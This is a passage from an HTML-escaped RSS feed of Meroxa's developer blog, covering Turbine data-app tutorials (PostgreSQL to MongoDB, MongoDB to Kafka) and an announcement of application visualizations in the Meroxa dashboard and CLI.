    console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[DEBUG] Streaming Record To Destination: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;dateTimeGmt&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Encrypt data using a 3rd party library or package&lt;/span&gt;
    record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
      &lt;span class=&quot;token string&quot;&gt;&apos;secretcode&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token function&quot;&gt;sha256&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;secretcode&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Format Data via a custom function&lt;/span&gt;
    record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;phone_number&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;formatPhone&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;phone_number&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Enrich Data via an API&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; addressLookupResults &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;googleMapsLookup&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;address&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; addressMetaData &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;generateAddressObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;addressLookupResults&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;address_metadata&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; addressMetaData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;unwrap&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 For a more detailed example of using APIs and doing transformations in Turbine, you can read our blog post &lt;a href=&quot;https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Deploying Your Application&lt;/p&gt;
&lt;p&gt;Commit your changes&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Deploy your app&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 To visualize your deployed application, you can check out an overview of our Turbine visualizations &lt;a href=&quot;https://meroxa.com/blog/introducing-visualized-turbine-applications&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Once your app is deployed you will see the PostgreSQL data populate in the &lt;code class=&quot;language-text&quot;&gt;user_copy&lt;/code&gt; collection in MongoDB Atlas. As records or changes come into your data source (PostgreSQL in this example), your Turbine app running on the Meroxa platform will process each record in real-time!&lt;/p&gt;
&lt;p&gt;Meroxa will set up all the connections and remove the complexities, so you, the developer, can focus on the important stuff.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing Visualized Turbine Applications]]></title><description><![CDATA[Visualizing the Turbine data app provides insight into the runtime details of the application’s components on the platform.]]></description><link>https://meroxa.com/blog/introducing-visualized-turbine-applications</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-visualized-turbine-applications</guid><dc:creator><![CDATA[Sara Menefee]]></dc:creator><pubDate>Thu, 08 Dec 2022 15:36:37 GMT</pubDate><content:encoded>&lt;p&gt;We are excited to announce that software developers can now visualize what is happening behind the scenes with their Turbine data apps deployed to the Meroxa Platform. The application visualization provides insight into the runtime details of the subcomponents the Meroxa Platform builds and configures based on the code written with Turbine, including the directional flow of data.&lt;/p&gt;
&lt;p&gt;We designed the Turbine Application Framework with &lt;em&gt;developer experience&lt;/em&gt; in mind. There&apos;s no need to learn a proprietary DSL (domain-specific language). Software developers can use their choice of supported programming language to build, test, and deploy robust data apps to process data streams, all while coexisting alongside an existing ecosystem of apps and services.&lt;/p&gt;
&lt;p&gt;The Meroxa platform simplifies deployment by abstracting away the complexity required to build out and configure the various subcomponents necessary to run the data app and scale it dynamically, on demand, on our serverless architecture. The visualization aims to make this transparent.&lt;/p&gt;
&lt;h2&gt;Turbine Application Details&lt;/h2&gt;
&lt;p&gt;The app visualization lives in the application details page for your Turbine data apps. Here’s what you can expect.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Intro%20Visualied%20Turbine%20App%20Blog%20Post_Image%201.png&quot; alt=&quot;Overview&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Source&lt;/h3&gt;
&lt;p&gt;A Source is a required Resource that contains the upstream data for the Turbine data app. Each Turbine data app is limited to a single Source, as we do not yet support multiple Sources. You may, however, include any number of APIs in your function to help enrich the data stream.&lt;/p&gt;
&lt;p&gt;The Source node in the app visualization communicates the &lt;code class=&quot;language-text&quot;&gt;name&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;type&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;state&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;collection&lt;/code&gt; (e.g. table, collection, index, etc.), and &lt;code class=&quot;language-text&quot;&gt;last updated&lt;/code&gt; timestamp.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Intro%20Visualied%20Turbine%20App%20Blog%20Post_Image%202.png&quot; alt=&quot;Source details&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Function&lt;/h3&gt;
&lt;p&gt;A Function contains the custom code you have written using the &lt;code class=&quot;language-text&quot;&gt;process&lt;/code&gt; method. This is where you can transform or enrich data with any number of APIs from third-party platforms and services. The app visualization communicates the &lt;code class=&quot;language-text&quot;&gt;name&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;state&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;last updated&lt;/code&gt; timestamp for the Function.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Intro%20Visualied%20Turbine%20App%20Blog%20Post_Image%202.png&quot; alt=&quot;Function details&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Destination(s)&lt;/h3&gt;
&lt;p&gt;A Destination is a Resource where data will be sent from the Turbine data app downstream. You may leverage any number of Destinations, or none at all. It’s up to you.&lt;/p&gt;
&lt;p&gt;Destination nodes in the app visualization communicate the &lt;code class=&quot;language-text&quot;&gt;name&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;type&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;state&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;collection&lt;/code&gt; (e.g. table, collection, index, etc), and &lt;code class=&quot;language-text&quot;&gt;last updated&lt;/code&gt; timestamp.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Intro%20Visualied%20Turbine%20App%20Blog%20Post_Image%204.png&quot; alt=&quot;Destination details&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Data Flow&lt;/h3&gt;
&lt;p&gt;Between each node, you should see an arrow pointing in the direction of where the data is going. An arrow may originate from a Source Resource to a Function or Destination Resource. Or from a Function to a Destination Resource. This will show you where your data is going directionally. Please note, we do not yet validate whether data is moving.&lt;/p&gt;
&lt;h2&gt;Viewing and Access&lt;/h2&gt;
&lt;p&gt;You can access the app visualization on the details page in the Meroxa Dashboard for the Turbine data app. This details page can be accessed directly through the dashboard or via a URL when using select commands in the Meroxa CLI.&lt;/p&gt;
&lt;h3&gt;Dashboard&lt;/h3&gt;
&lt;p&gt;Log in to your &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SAyN2RwTF9VdjFRc0pDNlY3SkpmT1FNbGo5TTlSemdBMKFupWxvZ2luo3RpZNkgWHRjb2xSQ1FyZjNtb3ZXZXl6akNoRzlSMzdFWnZ0QkajY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;audience=https%3A%2F%2Fapi.meroxa.io%2Fv1&amp;#x26;scope=openid+profile+email+user&amp;#x26;response_type=code&amp;#x26;response_mode=query&amp;#x26;nonce=UGR2Sk9iVzhxaUhDanJtcEQyRVYyaEwzeWlnb2xGUS1FOX5kVDhrNHdnUw%3D%3D&amp;#x26;code_challenge=x-Q8UtChGATkgoEIE0sPUUWWah552qPbhJ_tzVOPRHQ&amp;#x26;code_challenge_method=S256&amp;#x26;auth0Client=eyJuYW1lIjoiYXV0aDAtc3BhLWpzIiwidmVyc2lvbiI6IjEuMTQuMCJ9&amp;#x26;mode=login&quot;&gt;Meroxa account&lt;/a&gt;. Once authenticated, you should land on the &lt;strong&gt;Applications&lt;/strong&gt; tab. This will list all Turbine data apps deployed to your account along with their &lt;code class=&quot;language-text&quot;&gt;state&lt;/code&gt;. Click on the application name of choice to view the details page. This is where your app visualization may be accessed.&lt;/p&gt;
&lt;h3&gt;CLI&lt;/h3&gt;
&lt;p&gt;From within the Turbine data app&apos;s local project directory, running &lt;code class=&quot;language-text&quot;&gt;meroxa app describe&lt;/code&gt; in the Meroxa CLI will output details about your Turbine data app. Along with details about the app&apos;s subcomponents, the output includes a URL that takes you to the visualization in the Meroxa Dashboard.&lt;/p&gt;
&lt;p&gt;If you are working outside of the Turbine data app&apos;s local project directory, you can use &lt;code class=&quot;language-text&quot;&gt;meroxa app describe appname&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app describe&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token output&quot;&gt;      UUID:   123ab456-c7d8-91e0-fghi-j12k34lm56n
      Name:   yourappname
  Language:   javascript
   Git SHA:   ab1234c567de8910f1234g567891011h12i13j0k
Created At:   2022-11-16 19:22:26 +0000 UTC
Updated At:   2022-11-16 19:22:26 +0000 UTC
     State:   running
Resources
	pgdb (jdbc-destination)
		UUID:   12c228be-523c-477b-b4b5-2d25f6d05e8a
		Type:   postgres
		State:   running
	pgdb (debezium-pg-source)
		UUID:   98z765yx-432w-109v-u8t7-6s54r3q21p0o
		Type:   postgres
		State:   running

Functions
	anonymize-ab1234c
		UUID:   1a234bc-d567-8910-ef12-3456gh78ij90
		State:   running

    ✨ To visualize your application, visit https://dashboard.meroxa.io/apps/&amp;lt;yourappname&gt;/detail&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Using &lt;code class=&quot;language-text&quot;&gt;meroxa app list&lt;/code&gt; will display a table of all Turbine data apps deployed to your Meroxa account. This will include a direct URL to the Applications list page in the Meroxa Dashboard.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app list&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token output&quot;&gt;ID              NAME           LANGUAGE     STATE
====== ======================= ============ ==========
584           liveapp          javascript   running
2980           fooapp          golang       degraded
3095           barapp          python       running

✨ To visualize your applications, visit https://dashboard.meroxa.io/apps&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Have questions or feedback?&lt;/h3&gt;
&lt;p&gt;We love hearing from our customers! If you have questions or feedback, please feel free to contact us directly at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt; or by &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;joining our Discord community server&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;🚀 We can’t wait to see what you build!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Streaming changes in real-time from MongoDB to Apache Kafka]]></title><description><![CDATA[Learn how to efficiently pull data out of MongoDB in real-time using a Meroxa Turbine data stream processing app.]]></description><link>https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka</link><guid isPermaLink="false">https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Tue, 06 Dec 2022 21:35:10 GMT</pubDate><content:encoded>&lt;p&gt;It’s easy to see the appeal of MongoDB, so it’s no surprise it&apos;s so popular. With the advent of numerous managed providers, the operational burden has also been minimized.&lt;/p&gt;
&lt;p&gt;One problem that has not been solved particularly well is the ability to pull data out of MongoDB efficiently and in real-time. In our example, we will be moving data from MongoDB to Kafka in real-time.&lt;/p&gt;
&lt;p&gt;This post walks through building a Turbine Data Stream Processing App to do just that.&lt;/p&gt;
&lt;h3&gt;How it works&lt;/h3&gt;
&lt;p&gt;The Turbine Data Stream Processing App works by creating a CDC (Change Data Capture) connector from the platform to a MongoDB Atlas-hosted database. This connector receives changes in real-time and publishes them into the Meroxa Platform in the form of a stream.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/mongodb-to-kafka.png&quot; alt=&quot;mongodb-to-kafka&quot;&gt;&lt;/p&gt;
&lt;p&gt;The Turbine library allows us to write functions to transform and manipulate that data easily. In fact, we can do anything we normally do with a general programming language, such as calling APIs or importing packages and libraries.&lt;/p&gt;
&lt;p&gt;The Turbine framework does the heavy lifting to make that stream of data available to your custom function in a way that’s familiar and easy to reason about.&lt;/p&gt;
&lt;p&gt;In this example, we’re simply filtering out some of the data and passing the rest through to the downstream Kafka cluster.&lt;/p&gt;
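As a sketch, a filter of that shape could look like the following (the `is_test` field and the plain-object record stand-in are assumptions for illustration; real records come from the Turbine framework):

```javascript
// Illustrative filter: drop records flagged as test data and pass the
// rest through unchanged to the downstream destination.
function filterRecords(records) {
  return records.filter((record) => record.get('is_test') !== true);
}

// Tiny stand-in for a record, exposing a get(key) accessor like the
// records used in the JavaScript examples elsewhere on this blog.
function makeRecord(data) {
  return { get: (key) => data[key] };
}
```

The same pattern applies in any of Turbine's supported languages; only the record accessor changes.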
&lt;h3&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.mongodb.com/atlas/database&quot;&gt;MongoDB Instance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;Confluent Cloud Cluster&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://go.dev/doc/install&quot;&gt;Go&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Setup&lt;/h3&gt;
&lt;p&gt;We’ll be using &lt;a href=&quot;https://www.mongodb.com/atlas/database&quot;&gt;MongoDB Atlas&lt;/a&gt; and &lt;a href=&quot;https://www.confluent.io/confluent-cloud/&quot;&gt;Confluent Cloud&lt;/a&gt; in this example. Both services provide free trials and/or free plans, so it’s easy to create an account and follow along if you don’t already have one.&lt;/p&gt;
&lt;p&gt;Once you’ve created a MongoDB Atlas account, you can create a free &lt;em&gt;shared&lt;/em&gt; cluster. This will be enough for the purposes of testing out this application.&lt;/p&gt;
&lt;p&gt;💡 Refer to the MongoDB Atlas documentation &lt;a href=&quot;https://www.mongodb.com/docs/atlas/getting-started/&quot;&gt;here&lt;/a&gt; to set up a free shared cluster.&lt;/p&gt;
&lt;p&gt;Similarly, you can use the &lt;em&gt;basic&lt;/em&gt; Kafka plan on Confluent Cloud.&lt;/p&gt;
&lt;p&gt;💡 Refer to Meroxa’s guide &lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;here&lt;/a&gt; to set up a Confluent Cloud account.&lt;/p&gt;
&lt;p&gt;Next, we’ll initialize the Data Stream Processing App via the Meroxa CLI. If you need to create an account on Meroxa, you can &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme&quot;&gt;request a demo&lt;/a&gt;. Once you have created a &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa&lt;/a&gt; account and set up the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;, you need to add your resources and initialize a Turbine Data Stream Processing App.&lt;/p&gt;
&lt;p&gt;First, we will add the resources. Below, we are using the Meroxa CLI to add our MongoDB Atlas instance and Confluent Cloud instance. Alternatively, you can also do this via the &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Meroxa Dashboard&lt;/a&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create mdb &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type mongodb \
  --url &quot;mongodb://$MONGO_USER:$MONGO_PASS@$MONGO_URL:$MONGO_PORT&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create cck &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type confluentcloud \
  --url &quot;kafka+sasl+ssl://$API_KEY:$API_SECRET@$BOOTSTRAP_SERVER?sasl_mechanism=plain&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, we create a new Turbine App project (in Go) in the directory &lt;code class=&quot;language-text&quot;&gt;marketplace-notifier&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; go marketplace-notifier  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 If you prefer to use another language, Meroxa also supports &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/javascript/&quot;&gt;JavaScript&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python/&quot;&gt;Python&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby/&quot;&gt;Ruby&lt;/a&gt;, with support for many more languages coming!&lt;/p&gt;
&lt;p&gt;Now we’re all set to start implementing our Data Stream Processing App.&lt;/p&gt;
&lt;h3&gt;Data Stream Processing App&lt;/h3&gt;
&lt;p&gt;All Turbine Data Stream Processing Apps consist of two main parts: the pipeline topology part, where we define the components that make up the data pipeline (Resources, Sources, Destinations, Processors, etc.), and the function part, where we implement any custom logic that’s needed.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a App&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Turbine&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// reference the MongoDB resource that was created on the platform. In this case I created &quot;mdb&quot;.&lt;/span&gt;
  source&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;mdb&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// pull records from the &quot;events&quot; collection.&lt;/span&gt;
  rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;events&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
